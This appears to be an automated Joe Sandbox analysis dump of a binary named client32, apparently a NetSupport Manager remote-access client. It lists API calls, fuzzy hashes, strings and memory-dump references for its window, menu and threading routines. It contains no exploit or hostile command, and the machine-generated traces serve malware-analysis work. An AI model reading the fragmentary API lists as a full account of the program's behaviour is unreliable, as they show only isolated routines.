                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
                                                                                                                • String ID: Show16
                                                                                                                • API String ID: 625148989-2844191965
                                                                                                                • Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                                • Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
                                                                                                                • Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
                                                                                                                • Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
                                                                                                                • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                • API String ID: 2735369351-763374134
                                                                                                                • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                                                • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                                                APIs
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                                  • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                  • Part of subcall function 1100A250: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A298
                                                                                                                  • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                  • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                  • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                                • _free.LIBCMT ref: 1100B3C8
                                                                                                                • _free.LIBCMT ref: 1100B3CE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                • String ID:
                                                                                                                • API String ID: 705253285-0
                                                                                                                • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                                APIs
                                                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                                                                • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                • API String ID: 468487828-934300333
                                                                                                                • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                                                                • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                                                                • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                                                                APIs
                                                                                                                • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                                                  • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                                                                • EqualRect.USER32(?,?), ref: 1107740C
                                                                                                                • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                                                                Strings
                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                                                                • m_hWnd, xrefs: 11077447
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Window$DeferEqualPointsRect
                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                • API String ID: 2754115966-2830328467
                                                                                                                • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                                                                • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                                                                • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                • API String ID: 2446111109-1196874063
                                                                                                                • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                                • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                                                  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                                                  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                                                  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                                                • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                                                • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                                                • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                                                • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                                                Strings
                                                                                                                • Global\Client32Provider, xrefs: 1104F1BB
                                                                                                                • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                                                • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                                                • API String ID: 3682529815-1899068400
                                                                                                                • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                                • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                                                • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                                                • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 11171312
                                                                                                                  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                                                  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                                                                • __getptd.LIBCMT ref: 11171329
                                                                                                                • __amsg_exit.LIBCMT ref: 11171337
                                                                                                                • __lock.LIBCMT ref: 11171347
                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 938513278-0
                                                                                                                • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                                                                • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                                                                • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountTick
                                                                                                                • String ID: General$TicklePeriod
                                                                                                                • API String ID: 536389180-1546705386
                                                                                                                • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                                • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,771B23A0,1100BF7B), ref: 11110928
                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935
                                                                                                                • _free.LIBCMT ref: 1103D221
                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                  • Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970
                                                                                                                • SetPriorityClass.KERNEL32(?,?), ref: 1103D24C
                                                                                                                • MessageBeep.USER32(00000000), ref: 1103D25E
                                                                                                                Strings
                                                                                                                • Show has overrun too much, aborting, xrefs: 1103D1F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Leave$BeepClassEnterErrorFreeHeapLastMessagePriority_free
                                                                                                                • String ID: Show has overrun too much, aborting
                                                                                                                • API String ID: 304545663-4092325870
                                                                                                                • Opcode ID: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                                • Instruction ID: 9026de0c3b0683949d6f7ac94f5710338a9a532b2cd303e3c01edb637dee248d
                                                                                                                • Opcode Fuzzy Hash: 38cbc4052beda61ee506a84b884a1a9d6557445bc312e3507d1d7bbe4ecf2d69
                                                                                                                • Instruction Fuzzy Hash: 50F0B4B4B016139BFB59CBB08914BD9F69DBF8071DF000118E92C97280EB70B224C7D2
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 1101D3EB
                                                                                                                • EnableWindow.USER32(00000000,?), ref: 1101D3F6
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
